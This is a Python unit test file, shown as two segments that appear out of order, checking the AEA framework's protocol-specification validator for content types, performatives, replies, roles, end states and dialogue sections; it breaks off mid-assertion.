invalid_result_1 is False assert ( invalid_msg_1 == "Missing required field 'initiation' in the dialogue section of the protocol specification." ) invalid_dialogue_config_2 = valid_dialogue_config_1.copy() invalid_dialogue_config_2.pop("reply") ( invalid_result_2, invalid_msg_2, ) = _validate_field_existence(invalid_dialogue_config_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "Missing required field 'reply' in the dialogue section of the protocol specification." ) def test_validate_initiation(self): """Test for the '_validate_initiation' method.""" valid_initiation_1 = ["perm_1", "perm_2"] valid_performatives_set = {"perm_1", "perm_2", "perm_3", "perm_4"} valid_result_1, valid_msg_1 = _validate_initiation( valid_initiation_1, valid_performatives_set ) assert valid_result_1 is True assert valid_msg_1 == "Initial messages are valid." ################################################### invalid_initiation_1 = [] invalid_result_1, invalid_msg_1 = _validate_initiation( invalid_initiation_1, valid_performatives_set ) assert invalid_result_1 is False assert ( invalid_msg_1 == "At least one initial performative for this dialogue must be specified." ) invalid_initiation_2 = ["perm_5"] invalid_result_2, invalid_msg_2 = _validate_initiation( invalid_initiation_2, valid_performatives_set ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Performative 'perm_5' specified in \"initiation\" is not defined in the protocol's speech-acts." ) invalid_initiation_3 = "perm_1" invalid_result_3, invalid_msg_3 = _validate_initiation( invalid_initiation_3, valid_performatives_set ) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for initiation. Expected list. Found '{type(invalid_initiation_3)}'." ) def test_validate_reply(self): """Test for the '_validate_reply' method.""" valid_reply_1 = { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], "performative_empty_contents": ["performative_empty_contents"], } valid_performatives_set_1 = { "performative_ct", "performative_pt", "performative_pct", "performative_pmt", "performative_mt", "performative_o", "performative_empty_contents", } ( valid_result_1, valid_msg_1, terminal_performatives_from_reply_1, ) = _validate_reply(valid_reply_1, valid_performatives_set_1) assert valid_result_1 is True assert valid_msg_1 == "Reply structure is valid." assert terminal_performatives_from_reply_1 == { "performative_mt", "performative_o", } ################################################### invalid_reply_1 = { "perm_1": ["perm_2"], "perm_2": ["perm_3"], "perm_3": ["perm_4"], "perm_4": [], } invalid_performatives_set_1 = {"perm_1", "perm_2", "perm_3", "perm_4", "perm_5"} ( invalid_result_1, invalid_msg_1, invalid_terminal_performatives_from_reply_1, ) = _validate_reply(invalid_reply_1, invalid_performatives_set_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "No reply is provided for the following performatives: {}".format( {"perm_5"}, ) ) assert invalid_terminal_performatives_from_reply_1 is None invalid_reply_2 = { "perm_1": ["perm_2"], "perm_2": ["perm_3"], "perm_3": ["perm_4"], "perm_4": ["perm_5"], "perm_5": [], } invalid_performatives_set_2 = {"perm_1", "perm_2", "perm_3", "perm_4"} ( invalid_result_2, invalid_msg_2, invalid_terminal_performatives_from_reply_2, ) = _validate_reply(invalid_reply_2, invalid_performatives_set_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "Performative 'perm_5' in the list of replies for 'perm_4' is not defined in speech-acts." ) assert invalid_terminal_performatives_from_reply_2 is None invalid_reply_3 = ["perm_1", "perm_2", "perm_3", "perm_4", "perm_5"] ( invalid_result_3, invalid_msg_3, invalid_terminal_performatives_from_reply_3, ) = _validate_reply(invalid_reply_3, invalid_performatives_set_1) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for the reply definition. Expected dict. Found '{type(invalid_reply_3)}'." ) assert invalid_terminal_performatives_from_reply_3 is None invalid_reply_4 = { "perm_1": {"perm_2"}, "perm_2": {"perm_3"}, "perm_3": {"perm_4"}, "perm_4": {"perm_5"}, "perm_5": set(), } ( invalid_result_4, invalid_msg_4, invalid_terminal_performatives_from_reply_4, ) = _validate_reply(invalid_reply_4, invalid_performatives_set_1) assert invalid_result_4 is False assert ( invalid_msg_4 == f"Invalid type for replies of performative perm_1. Expected list. Found '{type({"perm_2"})}'." ) assert invalid_terminal_performatives_from_reply_4 is None invalid_reply_5 = { "perm_1": ["perm_2"], "perm_2": ["perm_3"], "perm_3": ["perm_4"], "perm_4": ["perm_1"], "perm_5": [], } ( invalid_result_5, invalid_msg_5, invalid_terminal_performatives_from_reply_5, ) = _validate_reply(invalid_reply_5, invalid_performatives_set_2) assert invalid_result_5 is False assert ( invalid_msg_5 == "Performative 'perm_5' specified in \"reply\" is not defined in the protocol's speech-acts." ) assert invalid_terminal_performatives_from_reply_5 is None def test_validate_termination(self): """Test for the '_validate_termination' method.""" valid_termination_1 = ["perm_4", "perm_3"] valid_performatives_set = {"perm_1", "perm_2", "perm_3", "perm_4"} valid_terminal_performatives_from_reply_1 = {"perm_4", "perm_3"} valid_result_1, valid_msg_1 = _validate_termination( valid_termination_1, valid_performatives_set, valid_terminal_performatives_from_reply_1, ) assert valid_result_1 is True assert valid_msg_1 == "Terminal messages are valid." ################################################### invalid_termination_1 = [] invalid_terminal_performatives_from_reply_1 = set() invalid_result_1, invalid_msg_1 = _validate_termination( invalid_termination_1, valid_performatives_set, invalid_terminal_performatives_from_reply_1, ) assert invalid_result_1 is False assert ( invalid_msg_1 == "At least one terminal performative for this dialogue must be specified." ) invalid_termination_2 = ["perm_5"] invalid_terminal_performatives_from_reply_2 = {"perm_5"} invalid_result_2, invalid_msg_2 = _validate_termination( invalid_termination_2, valid_performatives_set, invalid_terminal_performatives_from_reply_2, ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Performative 'perm_5' specified in \"termination\" is not defined in the protocol's speech-acts." ) invalid_termination_3 = {"perm_5"} invalid_terminal_performatives_from_reply_3 = {"perm_5"} invalid_result_3, invalid_msg_3 = _validate_termination( invalid_termination_3, valid_performatives_set, invalid_terminal_performatives_from_reply_3, ) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for termination. Expected list. Found '{type(invalid_termination_3)}'." ) invalid_termination_4 = ["perm_4", "perm_3", "perm_4", "perm_3", "perm_1"] invalid_terminal_performatives_from_reply_4 = {"perm_4", "perm_3", "perm_1"} invalid_result_4, invalid_msg_4 = _validate_termination( invalid_termination_4, valid_performatives_set, invalid_terminal_performatives_from_reply_4, ) assert invalid_result_4 is False assert ( invalid_msg_4 == f'There are {2} duplicate performatives in "termination".' ) invalid_termination_5 = ["perm_4", "perm_3"] invalid_terminal_performatives_from_reply_5 = {"perm_4"} invalid_result_5, invalid_msg_5 = _validate_termination( invalid_termination_5, valid_performatives_set, invalid_terminal_performatives_from_reply_5, ) assert invalid_result_5 is False assert ( invalid_msg_5 == 'The terminal performative \'perm_3\' specified in "termination" is assigned replies in "reply".' ) invalid_termination_6 = ["perm_4"] invalid_terminal_performatives_from_reply_6 = {"perm_4", "perm_3"} invalid_result_6, invalid_msg_6 = _validate_termination( invalid_termination_6, valid_performatives_set, invalid_terminal_performatives_from_reply_6, ) assert invalid_result_6 is False assert ( invalid_msg_6 == "The performative 'perm_3' has no replies but is not listed as a terminal performative in \"termination\"." ) def test_validate_roles(self): """Test for the '_validate_roles' method.""" valid_roles_1 = {"role_1": None, "role_2": None} valid_result_1, valid_msg_1 = _validate_roles(valid_roles_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue roles are valid." valid_roles_2 = {"role_1": None} valid_result_2, valid_msg_2 = _validate_roles(valid_roles_2) assert valid_result_2 is True assert valid_msg_2 == "Dialogue roles are valid." ################################################### invalid_roles_1 = dict() invalid_result_1, invalid_msg_1 = _validate_roles(invalid_roles_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "There must be either 1 or 2 roles defined in this dialogue. Found 0" ) invalid_roles_2 = {"role_1": None, "role_2": None, "role_3": None} invalid_result_2, invalid_msg_2 = _validate_roles(invalid_roles_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "There must be either 1 or 2 roles defined in this dialogue. Found 3" ) invalid_roles_3 = {"_agent_": None} invalid_result_3, invalid_msg_3 = _validate_roles(invalid_roles_3) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid name for role '_agent_'. Role names must match the following regular expression: {} ".format( ROLE_REGEX_PATTERN ) ) invalid_roles_4 = {"client"} invalid_result_4, invalid_msg_4 = _validate_roles(invalid_roles_4) assert invalid_result_4 is False assert ( invalid_msg_4 == f"Invalid type for roles. Expected dict. Found '{type(invalid_roles_4)}'." ) def test_validate_end_states(self): """Test for the '_validate_end_states' method.""" valid_end_states_1 = ["end_state_1", "end_state_2"] valid_result_1, valid_msg_1 = _validate_end_states(valid_end_states_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue end_states are valid." valid_end_states_2 = [] valid_result_2, valid_msg_2 = _validate_end_states(valid_end_states_2) assert valid_result_2 is True assert valid_msg_2 == "Dialogue end_states are valid." ################################################### invalid_end_states_1 = ["_end_state_1"] invalid_result_1, invalid_msg_1 = _validate_end_states(invalid_end_states_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for end_state '_end_state_1'. End_state names must match the following regular expression: {} ".format( END_STATE_REGEX_PATTERN ) ) invalid_end_states_2 = ["end_$tate_1"] invalid_result_2, invalid_msg_2 = _validate_end_states(invalid_end_states_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for end_state 'end_$tate_1'. End_state names must match the following regular expression: {} ".format( END_STATE_REGEX_PATTERN ) ) invalid_end_states_3 = {"end_state_1"} invalid_result_3, invalid_msg_3 = _validate_end_states(invalid_end_states_3) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for roles. Expected list. Found '{type(invalid_end_states_3)}'." ) def test_validate_keep_terminal(self): """Test for the '_validate_keep_terminal' method.""" valid_keep_terminal_state_dialogues_1 = True valid_result_1, valid_msg_1 = _validate_keep_terminal( valid_keep_terminal_state_dialogues_1 ) assert valid_result_1 is True assert valid_msg_1 == "Dialogue keep_terminal_state_dialogues is valid." valid_keep_terminal_state_dialogues_2 = False valid_result_2, valid_msg_2 = _validate_keep_terminal( valid_keep_terminal_state_dialogues_2 ) assert valid_result_2 is True assert valid_msg_2 == "Dialogue keep_terminal_state_dialogues is valid." ################################################### invalid_keep_terminal_state_dialogues_1 = "some_non_boolean_value" invalid_result_1, invalid_msg_1 = _validate_keep_terminal( invalid_keep_terminal_state_dialogues_1 ) assert invalid_result_1 is False assert ( invalid_msg_1 == f"Invalid type for keep_terminal_state_dialogues. Expected bool. Found {type(invalid_keep_terminal_state_dialogues_1)}." ) @mock.patch( "aea.configurations.base.ProtocolSpecification", ) def test_validate_dialogue_section(self, mocked_spec): """Test for the '_validate_dialogue_section' method.""" valid_dialogue_config_1 = { "initiation": ["performative_ct", "performative_pt"], "reply": { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], "performative_empty_contents": ["performative_empty_contents"], }, "termination": ["performative_mt", "performative_o"], "roles": {"role_1": None, "role_2": None}, "end_states": ["end_state_1", "end_state_2", "end_state_3"], "keep_terminal_state_dialogues": True, } valid_performatives_set_1 = { "performative_ct", "performative_pt", "performative_pct", "performative_pmt", "performative_mt", "performative_o", "performative_empty_contents", } mocked_spec.dialogue_config = valid_dialogue_config_1 ( valid_result_1, valid_msg_1, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue section of the protocol specification is valid." ################################################### invalid_dialogue_config_1 = valid_dialogue_config_1.copy() invalid_dialogue_config_1["initiation"] = ["new_performative"] mocked_spec.dialogue_config = invalid_dialogue_config_1 ( invalid_result_1, invalid_msg_1, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "Performative 'new_performative' specified in \"initiation\" is not defined in the protocol's speech-acts." ) invalid_dialogue_config_2 = valid_dialogue_config_1.copy() invalid_dialogue_config_2["reply"] = { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], } mocked_spec.dialogue_config = invalid_dialogue_config_2 ( invalid_result_2, invalid_msg_2, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_2 is False assert ( invalid_msg_2 == "No reply is provided for the following performatives: {}".format( {"performative_empty_contents"}, ) ) invalid_dialogue_config_3 = valid_dialogue_config_1.copy() invalid_dialogue_config_3["termination"] = ["new_performative"] mocked_spec.dialogue_config = invalid_dialogue_config_3 ( invalid_result_3, invalid_msg_3, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_3 is False assert ( invalid_msg_3 == "Performative 'new_performative' specified in \"termination\" is not defined in the protocol's speech-acts." ) invalid_dialogue_config_4 = valid_dialogue_config_1.copy() invalid_dialogue_config_4["roles"] = { "role_1": None, "role_2": None, "role_3": None, } mocked_spec.dialogue_config = invalid_dialogue_config_4 ( invalid_result_4, invalid_msg_4, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_4 is False assert ( invalid_msg_4 == "There must be either 1 or 2 roles defined in this dialogue. Found 3" ) invalid_dialogue_config_5 = valid_dialogue_config_1.copy() invalid_dialogue_config_5["end_states"] = ["end_$tate_1"] mocked_spec.dialogue_config = invalid_dialogue_config_5 ( invalid_result_5, invalid_msg_5, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid name for end_state 'end_$tate_1'. End_state names must match the following regular expression: {} ".format( END_STATE_REGEX_PATTERN ) ) invalid_dialogue_config_6 = valid_dialogue_config_1.copy() invalid_dialogue_config_6.pop("termination") mocked_spec.dialogue_config = invalid_dialogue_config_6 ( invalid_result_6, invalid_msg_6, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_6 is False assert ( invalid_msg_6 == "Missing required field 'termination' in the dialogue section of the protocol specification." ) invalid_value = 521 invalid_dialogue_config_7 = valid_dialogue_config_1.copy() invalid_dialogue_config_7["keep_terminal_state_dialogues"] = invalid_value mocked_spec.dialogue_config = invalid_dialogue_config_7 ( invalid_result_7, invalid_msg_7, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_7 is False assert ( invalid_msg_7 == f"Invalid type for keep_terminal_state_dialogues. Expected bool. Found {type(invalid_value)}." ) @mock.patch("aea.configurations.base.ProtocolSpecification") @mock.patch( "aea.protocols.generator.validate._validate_speech_acts_section", return_value=tuple([True, "Speech_acts are correct!", set(), set()]), ) @mock.patch( "aea.protocols.generator.validate._validate_protocol_buffer_schema_code_snippets", return_value=tuple([True, "Protobuf snippets are correct!"]), ) @mock.patch( "aea.protocols.generator.validate._validate_dialogue_section", return_value=tuple([True, "Dialogue section is correct!"]), ) def test_validate_positive( self, mocked_spec, macked_validate_speech_acts, macked_validate_protobuf, macked_validate_dialogue, ): """Positive test for the 'validate' method: invalid dialogue section.""" ( valid_result_1, valid_msg_1, ) = validate(mocked_spec) assert valid_result_1 is True assert valid_msg_1 == "Protocol specification is valid." @mock.patch("aea.configurations.base.ProtocolSpecification") @mock.patch( "aea.protocols.generator.validate._validate_speech_acts_section", return_value=tuple([False, "Some error on speech_acts.", None, None]), ) def test_validate_negative_invalid_speech_acts( self, mocked_spec, macked_validate_speech_acts ): """Negative test for the 'validate' method: invalid speech_acts.""" ( invalid_result_1, invalid_msg_1, ) = validate(mocked_spec) assert invalid_result_1 is False assert invalid_msg_1 == "Some error on speech_acts." @mock.patch("aea.configurations.base.ProtocolSpecification") @mock.patch( "aea.protocols.generator.validate._validate_speech_acts_section", return_value=tuple([True, "Speech_acts are correct!", set(), set()]), ) @mock.patch( "aea.protocols.generator.validate._validate_protocol_buffer_schema_code_snippets", return_value=tuple([False, "Some error on protobuf snippets."]), ) def test_validate_negative_invalid_protobuf_snippets( self, mocked_spec, macked_validate_speech_acts, macked_validate_protobuf ): """Negative test for the 'validate' method: invalid protobuf snippets.""" ( invalid_result_1, invalid_msg_1, ) = validate(mocked_spec) assert invalid_result_1 is False assert invalid_msg_1 == "Some error on protobuf snippets." @mock.patch("aea.configurations.base.ProtocolSpecification") @mock.patch( "aea.protocols.generator.validate._validate_speech_acts_section", return_value=tuple([True, "Speech_acts are correct!", set(), set()]), ) @mock.patch( "aea.protocols.generator.validate._validate_protocol_buffer_schema_code_snippets", return_value=tuple([True, "Protobuf snippets are correct!"]), ) @mock.patch( "aea.protocols.generator.validate._validate_dialogue_section", return_value=tuple([False, "Some error on dialogue section."]), ) def test_validate_negative_invalid_dialogue_section( self, mocked_spec, macked_validate_speech_acts, macked_validate_protobuf, macked_validate_dialogue, ): """Negative test for the 'validate' method: invalid dialogue section.""" ( invalid_result_1, invalid_msg_1, ) = validate(mocked_spec) assert invalid_result_1 is False assert invalid_msg_1 == "Some error on dialogue section."
# -*- coding: utf-8 -*- # ------------------------------------------------------------------------------ # # Copyright 2022 Valory AG # Copyright 2018-2020 Fetch.AI Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ------------------------------------------------------------------------------ """This module contains the tests for generator/validate.py module.""" import logging from unittest import TestCase, mock from aea.configurations.base import CRUDCollection, SpeechActContentConfig from aea.protocols.generator.validate import ( CONTENT_NAME_REGEX_PATTERN, END_STATE_REGEX_PATTERN, PERFORMATIVE_REGEX_PATTERN, ROLE_REGEX_PATTERN, _has_brackets, _is_reserved_name, _is_valid_content_type_format, _is_valid_ct, _is_valid_dict, _is_valid_list, _is_valid_optional, _is_valid_pt, _is_valid_regex, _is_valid_set, _is_valid_union, _validate_content_name, _validate_content_type, _validate_dialogue_section, _validate_end_states, _validate_field_existence, _validate_initiation, _validate_keep_terminal, _validate_performatives, _validate_protocol_buffer_schema_code_snippets, _validate_reply, _validate_roles, _validate_speech_acts_section, _validate_termination, validate, ) logger = logging.getLogger("aea") logging.basicConfig(level=logging.INFO) class TestValidate(TestCase): """Test for generator/validate.py.""" def test_is_reserved_name(self): """Test for the '_is_reserved_name' method.""" invalid_content_name_1 = "_body" assert _is_reserved_name(invalid_content_name_1) is True invalid_content_name_2 = "message_id" assert _is_reserved_name(invalid_content_name_2) is True invalid_content_name_3 = "dialogue_reference" assert _is_reserved_name(invalid_content_name_3) is True invalid_content_name_4 = "target" assert _is_reserved_name(invalid_content_name_4) is True invalid_content_name_5 = "performative" assert _is_reserved_name(invalid_content_name_5) is True valid_content_nam_1 = "content_name" assert _is_reserved_name(valid_content_nam_1) is False valid_content_name_2 = "query" assert _is_reserved_name(valid_content_name_2) is False valid_content_name_3 = "ThiSiSAConTEnT234" assert _is_reserved_name(valid_content_name_3) is False def test_is_valid_regex(self): """Test for the '_is_valid_regex' method.""" regex_1 = "^[0-9][a-zA-Z0-9]*[A-Z]$" valid_text_1 = "53453hKb35nDkG" assert _is_valid_regex(regex_1, valid_text_1) is True invalid_text_1 = "hKbnDkG" assert _is_valid_regex(regex_1, invalid_text_1) is False invalid_text_2 = "4f nkG" assert _is_valid_regex(regex_1, invalid_text_2) is False def test_has_brackets(self): """Test for the '_has_brackets' method.""" valid_content_type_1 = "pt:set[pt:int]" assert _has_brackets(valid_content_type_1) is True valid_content_type_2 = "pt:union[hskdjf-8768&^${]hsdkjhfk]" assert _has_brackets(valid_content_type_2) is True valid_content_type_3 = "pt:optional[[]]" assert _has_brackets(valid_content_type_3) is True ################################################### invalid_content_type_1 = "ct:set[pt:int]" with self.assertRaises(SyntaxError) as cm: _has_brackets(invalid_content_type_1) self.assertEqual( str(cm.exception), "Content type must be a compositional type!" ) invalid_content_type_2 = "pt:tuple[pt:float]" with self.assertRaises(SyntaxError) as cm: _has_brackets(invalid_content_type_2) self.assertEqual( str(cm.exception), "Content type must be a compositional type!" ) invalid_content_type_3 = "pt:optinal[pt:bool]" with self.assertRaises(SyntaxError) as cm: _has_brackets(invalid_content_type_3) self.assertEqual( str(cm.exception), "Content type must be a compositional type!" ) ################################################### invalid_content_type_4 = "pt:optional{}" assert _has_brackets(invalid_content_type_4) is False invalid_content_type_5 = "pt:set[]7657" assert _has_brackets(invalid_content_type_5) is False invalid_content_type_6 = "pt:union [pt:int, pt:bool]" assert _has_brackets(invalid_content_type_6) is False invalid_content_type_7 = "pt:dict[pt:int, pt:bool] " assert _has_brackets(invalid_content_type_7) is False def test_is_valid_ct(self): """Test for the '_is_valid_ct' method.""" valid_content_type_1 = "ct:DataModel" assert _is_valid_ct(valid_content_type_1) is True valid_content_type_2 = "ct:ThisIsACustomContent" assert _is_valid_ct(valid_content_type_2) is True valid_content_type_3 = "ct:Query" assert _is_valid_ct(valid_content_type_3) is True valid_content_type_4 = " ct:Proposal " assert _is_valid_ct(valid_content_type_4) is True valid_content_type_5 = "ct:DSA" assert _is_valid_ct(valid_content_type_5) is True valid_content_type_6 = "ct:DataF" assert _is_valid_ct(valid_content_type_6) is True ################################################### invalid_content_type_1 = "ct:data" assert _is_valid_ct(invalid_content_type_1) is False invalid_content_type_2 = "Model" assert _is_valid_ct(invalid_content_type_2) is False invalid_content_type_3 = "ct: DataModel" assert _is_valid_ct(invalid_content_type_3) is False invalid_content_type_4 = "ct:E3" assert _is_valid_ct(invalid_content_type_4) is False def test_is_valid_pt(self): """Test for the '_is_valid_pt' method.""" valid_content_type_1 = "pt:bytes" assert _is_valid_pt(valid_content_type_1) is True valid_content_type_2 = "pt:int" assert _is_valid_pt(valid_content_type_2) is True valid_content_type_3 = "pt:float" assert _is_valid_pt(valid_content_type_3) is True valid_content_type_4 = "pt:bool" assert _is_valid_pt(valid_content_type_4) is True valid_content_type_5 = "pt:str" assert _is_valid_pt(valid_content_type_5) is True valid_content_type_6 = " pt:int " assert _is_valid_pt(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:integer" assert _is_valid_pt(invalid_content_type_1) is False invalid_content_type_2 = "bool" assert _is_valid_pt(invalid_content_type_2) is False invalid_content_type_3 = "pt: str" assert _is_valid_pt(invalid_content_type_3) is False invalid_content_type_4 = "pt;float" assert _is_valid_pt(invalid_content_type_4) is False def test_is_valid_set(self): """Test for the '_is_valid_set' method.""" valid_content_type_1 = "pt:set[pt:bytes]" assert _is_valid_set(valid_content_type_1) is True valid_content_type_2 = "pt:set[pt:int]" assert _is_valid_set(valid_content_type_2) is True valid_content_type_3 = "pt:set[pt:float]" assert _is_valid_set(valid_content_type_3) is True valid_content_type_4 = "pt:set[pt:bool]" assert _is_valid_set(valid_content_type_4) is True valid_content_type_5 = "pt:set[pt:str]" assert _is_valid_set(valid_content_type_5) is True valid_content_type_6 = " pt:set[ pt:int ] " assert _is_valid_set(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:frozenset[pt:int]" assert _is_valid_set(invalid_content_type_1) is False invalid_content_type_2 = "set[pt:int]" assert _is_valid_set(invalid_content_type_2) is False invalid_content_type_3 = "pt: set[pt:int]" assert _is_valid_set(invalid_content_type_3) is False invalid_content_type_4 = "pt:set[integer]" assert _is_valid_set(invalid_content_type_4) is False invalid_content_type_5 = "pt:set[int]" assert _is_valid_set(invalid_content_type_5) is False invalid_content_type_6 = "pt:set{int]" assert _is_valid_set(invalid_content_type_6) is False invalid_content_type_7 = "pt:set[pt:int, pt:str]" assert _is_valid_set(invalid_content_type_7) is False invalid_content_type_8 = "pt:set[]" assert _is_valid_set(invalid_content_type_8) is False invalid_content_type_9 = "pt:set[pt:list[pt:int, pt:list[pt:bool]]" assert _is_valid_set(invalid_content_type_9) is False invalid_content_type_10 = "pt:set" assert _is_valid_set(invalid_content_type_10) is False def test_is_valid_list(self): """Test for the '_is_valid_list' method.""" valid_content_type_1 = "pt:list[pt:bytes]" assert _is_valid_list(valid_content_type_1) is True valid_content_type_2 = "pt:list[pt:int]" assert _is_valid_list(valid_content_type_2) is True valid_content_type_3 = "pt:list[pt:float]" assert _is_valid_list(valid_content_type_3) is True valid_content_type_4 = "pt:list[pt:bool]" assert _is_valid_list(valid_content_type_4) is True valid_content_type_5 = "pt:list[pt:str]" assert _is_valid_list(valid_content_type_5) is True valid_content_type_6 = " pt:list[ pt:bool ] " assert _is_valid_list(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:tuple[pt:bytes]" assert _is_valid_list(invalid_content_type_1) is False invalid_content_type_2 = "list[pt:bool]" assert _is_valid_list(invalid_content_type_2) is False invalid_content_type_3 = "pt: list[pt:float]" assert _is_valid_list(invalid_content_type_3) is False invalid_content_type_4 = "pt:list[string]" assert _is_valid_list(invalid_content_type_4) is False invalid_content_type_5 = "pt:list[bool]" assert _is_valid_list(invalid_content_type_5) is False invalid_content_type_6 = "pt:list[bytes" assert _is_valid_list(invalid_content_type_6) is False invalid_content_type_7 = "pt:list[pt:float, pt:bool]" assert _is_valid_list(invalid_content_type_7) is False invalid_content_type_8 = "pt:list[]" assert _is_valid_list(invalid_content_type_8) is False invalid_content_type_9 = "pt:list[pt:set[pt:bool, pt:set[pt:str]]" assert _is_valid_list(invalid_content_type_9) is False invalid_content_type_10 = "pt:list" assert _is_valid_list(invalid_content_type_10) is False def test_is_valid_dict(self): """Test for the '_is_valid_dict' method.""" valid_content_type_1 = "pt:dict[pt:bytes, pt:int]" assert _is_valid_dict(valid_content_type_1) is True valid_content_type_2 = "pt:dict[pt:int, pt:int]" assert _is_valid_dict(valid_content_type_2) is True valid_content_type_3 = "pt:dict[pt:float, pt:str]" assert _is_valid_dict(valid_content_type_3) is True valid_content_type_4 = "pt:dict[pt:bool, pt:str]" assert _is_valid_dict(valid_content_type_4) is True valid_content_type_5 = "pt:dict[pt:bool,pt:float]" assert _is_valid_dict(valid_content_type_5) is True valid_content_type_6 = " pt:dict[ pt:bytes , pt:int ] " assert _is_valid_dict(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:map[pt:bool, pt:str]" assert _is_valid_dict(invalid_content_type_1) is False invalid_content_type_2 = "dict[pt:int, pt:float]" assert _is_valid_dict(invalid_content_type_2) is False invalid_content_type_3 = "pt: dict[pt:bytes, pt:bool]" assert _is_valid_dict(invalid_content_type_3) is False invalid_content_type_4 = "pt:dict[float, pt:str]" assert _is_valid_dict(invalid_content_type_4) is False invalid_content_type_5 = "pt:dict[pt:bool, pt:integer]" assert _is_valid_dict(invalid_content_type_5) is False invalid_content_type_6 = "pt:dict(pt:boolean, pt:int" assert _is_valid_dict(invalid_content_type_6) is False invalid_content_type_7 = "pt:dict[pt:boolean]" assert _is_valid_dict(invalid_content_type_7) is False invalid_content_type_8 = "pt:dict[]" assert _is_valid_dict(invalid_content_type_8) is False invalid_content_type_9 = "pt:dict[pt:str, pt:float, pt:int, pt:bytes]" assert _is_valid_dict(invalid_content_type_9) is False invalid_content_type_10 = "pt:dict[pt:set[pt:bool, pt:str]" assert _is_valid_dict(invalid_content_type_10) is False invalid_content_type_11 = "pt:dict" assert _is_valid_dict(invalid_content_type_11) is False def test_is_valid_union(self): """Test for the '_is_valid_union' method.""" valid_content_type_1 = ( "pt:union[pt:bytes, pt:int, pt:float, pt:bool, pt:str, pt:set[pt:bytes], " "pt:set[pt:int], pt:set[pt:float], pt:set[pt:bool], pt:set[pt:str], " "pt:list[pt:bytes], pt:list[pt:int], pt:list[pt:float], pt:list[pt:bool], pt:list[pt:str], " "pt:dict[pt:bytes, pt:bytes], pt:dict[ pt:bytes , pt:int ] , pt:dict[pt:bytes, pt:float], pt:dict[pt:bytes, pt:bool], pt:dict[pt:bytes, pt:str], " "pt:dict[pt:int, pt:bytes], pt:dict[pt:int, pt:int], pt:dict[pt:int, pt:float], pt:dict[pt:int, pt:bool], pt:dict[pt:int, pt:str], " "pt:dict[pt:float, pt:bytes], pt:dict[pt:float, pt:int], pt:dict[pt:float, pt:float], pt:dict[pt:float, pt:bool], pt:dict[pt:float, pt:str], " "pt:dict[pt:bool, pt:bytes], pt:dict[pt:bool, pt:int], pt:dict[pt:bool,pt:float], pt:dict[pt:bool, pt:bool], pt:dict[pt:bool, pt:str], " "pt:dict[pt:str, pt:bytes], pt:dict[pt:str, pt:int], pt:dict[pt:str,pt:float], pt:dict[pt:str, pt:bool], pt:dict[pt:str, pt:str]]" ) assert _is_valid_union(valid_content_type_1) is True valid_content_type_2 = "pt:union[pt:bytes, pt:set[pt:int]]" assert _is_valid_union(valid_content_type_2) is True valid_content_type_3 = "pt:union[pt:float, pt:bool]" assert _is_valid_union(valid_content_type_3) is True valid_content_type_4 = "pt:union[pt:set[pt:int], pt:set[pt:float]]" assert _is_valid_union(valid_content_type_4) is True valid_content_type_5 = "pt:union[pt:bool,pt:bytes]" assert _is_valid_union(valid_content_type_5) is True valid_content_type_6 = " pt:union[ pt:bytes , pt:set[ pt:int ] ] " assert _is_valid_union(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:onion[pt:bool, pt:str]" assert _is_valid_union(invalid_content_type_1) is False invalid_content_type_2 = "union[pt:int, pt:float]" assert _is_valid_union(invalid_content_type_2) is False invalid_content_type_3 = "pt: union[pt:set[pt:int], pt:bool]" assert _is_valid_union(invalid_content_type_3) is False invalid_content_type_4 = "pt:union[float, pt:str" assert _is_valid_union(invalid_content_type_4) is False invalid_content_type_5 = "pt:union[pt:int, pt:dict[pt:str, pt:bool]" assert _is_valid_union(invalid_content_type_5) is False invalid_content_type_6 = "pt:union{pt:boolean, pt:int]" assert _is_valid_union(invalid_content_type_6) is False invalid_content_type_7 = "pt:union[pt:boolean]" assert 